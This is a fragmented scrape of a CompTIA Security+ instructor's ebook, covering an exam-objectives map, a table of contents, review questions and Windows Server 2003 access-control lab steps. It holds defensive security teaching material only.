Objective 3.5 (continued) Network Hardening Updates (Firmware) Configuration Enabling and Disabling Services and Protocols Access Control Lists Application Hardening Updates (Hotfixes, Service Packs, Patches) Web Servers E-mail Servers FTP (File Transfer Protocol) Servers DNS (Domain Name Service) Servers NNTP (Network News Transfer Protocol) Servers File / Print Servers DHCP (Dynamic Host Configuration Protocol) Servers Data Repositories Directory Services Databases Unit 13, Topic B Unit 13, Topic B Unit 13, Topic B Unit 13, Topic B Unit 13, Topic B Unit 13, Topic C Unit 13, Topic C Unit 13, Topic C Unit 13, Topic C Unit 13, Topic C Unit 13, Topic C Unit 13, Topic C Unit 13, Topic C Unit 13, Topic C C-1 C-1 C-1 C-2 C-2 C-3 C-3 B-3 B-1 Conceptual information Supporting activities
Unit 13, Topic C Unit 13, Topic C Unit 13, Topic C C-4
A9
Domain 4.0: Basics of Cryptography

Objective 4.1 Be able to identify and explain the following different kinds of cryptographic algorithms Hashing Symmetric Asymmetric 4.2 Understand how cryptography addresses the following security concepts Confidentiality Unit 14, Topic A Unit 5, Topic A Unit 14, Topic A Unit 5, Topic A Unit 14, Topic A Unit 5, Topic A Unit 14, Topic A Unit 5, Topic A Unit 14, Topic A Unit 5, Topic A Unit 14, Topic A Unit 5, Topic A Unit 14, Topic A A-2 A-2 A-2 A-2 Unit 14, Topic A Unit 2, Topic D Unit 14, Topic A Unit 2, Topic D Unit 14, Topic A A-2 D-1 A-1 D-1 A-1 Conceptual information Supporting activities
Integrity Digital Signatures Authentication
Non-Repudiation Digital Signatures Access Control 4.3 Understand and be able to explain the following concepts of PKI (Public Key Infrastructure) Certificates
Unit 2, Topic D Unit 6, Topic A Unit 14, Topic B Unit 14, Topic B Unit 14, Topic B Unit 14, Topic C Unit 14, Topic B Unit 14, Topic B
D-1 B-1 B-1 B-1 C-1 B-1 B-1
Certificate Policies Certificate Practice Statements Revocation Trust Models 4.4 Identify and be able to differentiate different cryptographic standards and protocols
A10

Objective 4.5 Understand and be able to explain the following concepts of Key Management and Certificate Lifecycles Centralized vs. Decentralized Storage Hardware vs. Software Private Key Protection Escrow Expiration Revocation Status Checking Suspension Status Checking Recovery M-of-N Control (Of M appropriate individuals, N must be present to authorize recovery) Renewal Destruction Key Usage Multiple Key Pairs (Single, Dual) Unit 14, Topic C Unit 14, Topic C Unit 14, Topic C Unit 14, Topic C Unit 14, Topic C Unit 14, Topic C Unit 14, Topic C Unit 14, Topic D Unit 14, Topic C Unit 14, Topic C Unit 14, Topic C Unit 14, Topic C Unit 14, Topic C C-1 C-1 C-1 C-1 C-1 D-5 C-1 C-1 Conceptual information Supporting activities
Unit 14, Topic C Unit 14, Topic C Unit 14, Topic C Unit 14, Topic C
C-1 C-1 C-1
A11
Domain 5.0: Operational / Organizational Security

Objective 5.1 Understand the application of the following concepts of physical security Access Control Physical Barriers Biometrics Social Engineering Unit 15, Topic A Unit 15, Topic A Unit 2, Topic F Unit 15, Topic A Unit 3, Topic F Unit 15, Topic A Unit 15, Topic B Unit 15, Topic B Unit 15, Topic B Unit 15, Topic B Unit 15, Topic B B-1 B-1 A-1 A-1 F-1 A-2 F-1 A-3 B-1 Conceptual information Supporting activities
Environment Wireless Cells Location Shielding Fire Suppression 5.2 Understand the security implications of the following topics of disaster recovery Backups Off Site Storage Secure Recovery Alternate Sites Disaster Recovery Plan 5.3 Understand the security implications of the following topics of business continuity Utilities High Availability / Fault Tolerance Backups
Unit 16, Topic A Unit 16, Topic A Unit 16, Topic A Unit 16, Topic A Unit 16, Topic A
A-1 A-1
A-1
Unit 16, Topic B Unit 16, Topic B Unit 16, Topic B B-1 B-1
A12

Objective 5.4 Understand the concepts and uses of the following types of policies and procedures Security Policy Acceptable Use Due Care Privacy Separation of Duties Need to Know Password Management SLAs (Service Level Agreements) Disposal / Destruction HR (Human Resources) Policy Termination (Adding and revoking passwords and privileges, etc.) Hiring (Adding and revoking passwords and privileges, etc.) Code of Ethics Incident Response Policy 5.5 Explain the following concepts of privilege management User / Group / Role Management Single Sign-on Auditing (Privilege, Usage, Escalation) MAC / DAC / RBAC (Mandatory Access Control / Discretionary Access Control / Role Based Access Control) 5.6 Understand the concepts of the following topics of forensics Chain of Custody Preservation of Evidence Collection of Evidence Unit 17, Topic A Unit 17, Topic A Unit 17, Topic A A-1 A-1 A-1 Unit 16, Topic D Unit 16, Topic D Unit 16, Topic D Unit 1, Topic D D-1 D-1 D-1 Unit 16, Topic C Unit 16, Topic C Unit 16, Topic C Unit 16, Topic C Unit 16, Topic C Unit 16, Topic C Unit 16, Topic C Unit 16, Topic C Unit 16, Topic C Unit 16, Topic C Unit 16, Topic C C-2 C-2 C-1 C-1 C-1 C-1 C-1 Conceptual information Supporting activities
Unit 16, Topic C
Unit 16, Topic C Unit 16, Topic C
C-2 C-3

Objective 5.7 Understand and be able to explain the following concepts of risk identification Asset Identification Risk Assessment Threat Identification Vulnerabilities 5.8 Understand the security relevance of the education and training of end users and human resources Communication User Awareness Education On-line Resources 5.9 Understand and explain the following documentation concepts Standards and Guidelines Systems Architecture Change Documentation Logs and Inventories Classification Notification Retention / Storage Destruction Unit 17, Topic D Unit 17, Topic D Unit 17, Topic D Unit 17, Topic D Unit 17, Topic D Unit 17, Topic D Unit 17, Topic D Unit 17, Topic D D-1 D-1 D-1 D-1 D-1 Unit 17, Topic C Unit 17, Topic C Unit 17, Topic C Unit 17, Topic C C-1 C-1 C-1 Unit 17, Topic B Unit 17, Topic B Unit 17, Topic B Unit 17, Topic B B-1 B-1 Conceptual information
A13
A14

Ebook Security+ CompTia

Загружено:

Сведения о документе

Исходное описание:

Оригинальное название

Авторское право

Доступные форматы

Поделиться этим документом

Поделиться или встроить документ

Параметры публикации

Этот документ был вам полезен?

Это неприемлемый материал?

Авторское право:

Доступные форматы

Ebook Security+ CompTia

Загружено:

Авторское право:

Доступные форматы

CompTIA Security+ Certification Instructors Edition

Attacks and malicious code

Topic A: SSL/TLS protocol............................................................................. 6-2

Directory and file transfer services

Wireless and instant messaging

Transmission and storage media

Network security topologies

iii Cryptography 14-1

Disaster recovery and business continuity

Computer forensics and advanced topics

Certification exam objectives map Course summary

CompTIA Security+ Certification

Unit 1 Security overview

a secure network strategy.

CompTIA Security+ Certification

Topic A: Introduction to network security

Goals of network security

CompTIA Security+ Certification

Discussing network security

Questions and answers

Maintain integrity Protect confidentiality Assure availability Improve performance

2 Which one of the following types of access can be threats to networks? A B

Authorized Needed Unauthorized Invalid

5 Availability is defined as the continuous operation of computing systems. True or false?

Topic B: Understanding security threats

CompTIA Security+ Certification

Identifying security threats

Questions and answers

TCP/IP Operating systems Network equipment All of the above

Identity theft Confidentiality Integrity All of the above

3 Which of the following is not a primary cause of network security threats?

Encryption Technology weaknesses Policy weaknesses Configuration weaknesses Human error

5 Which of the following is not considered a configuration weakness? A B C

Topic C: Creating a secure network strategy

Security overview Web and file servers

CompTIA Security+ Certification

Discussing strategies to secure your network

Questions and answers

2 Which of the following is considered a successful approach to network security? A B C D

3 Which of the following is/are incorrect about firewalls? A B C

4 Examples of access controls might include which of the following? A B C

Smartcards Security token PINs All of the above

Topic D: Windows Server 2003 server access control

Introducing server access control

MAC, DAC, and RBAC

Using NTFS to implement access control

Security overview Do it!

Converting to an NTFS system Heres why

3 At the command line, enter

4 At the command line, enter

To convert the FAT partition to NTFS.

Windows will then convert the drive to NTFS.

To verify that the drive is now NTFS.

To close the Command window.

CompTIA Security+ Certification

Ensuring data confidentiality Heres why

1 Open My Computer Double-click the E: drive

Security overview 7 Click Advanced 8 Clear Allow inheritable

9 Click Copy 10 Click OK 11 Click Add

12 Click Advanced 13 Click Find Now Under Search results, select

To add User1 to the access control list.

Full Control activates all other permissions in the list.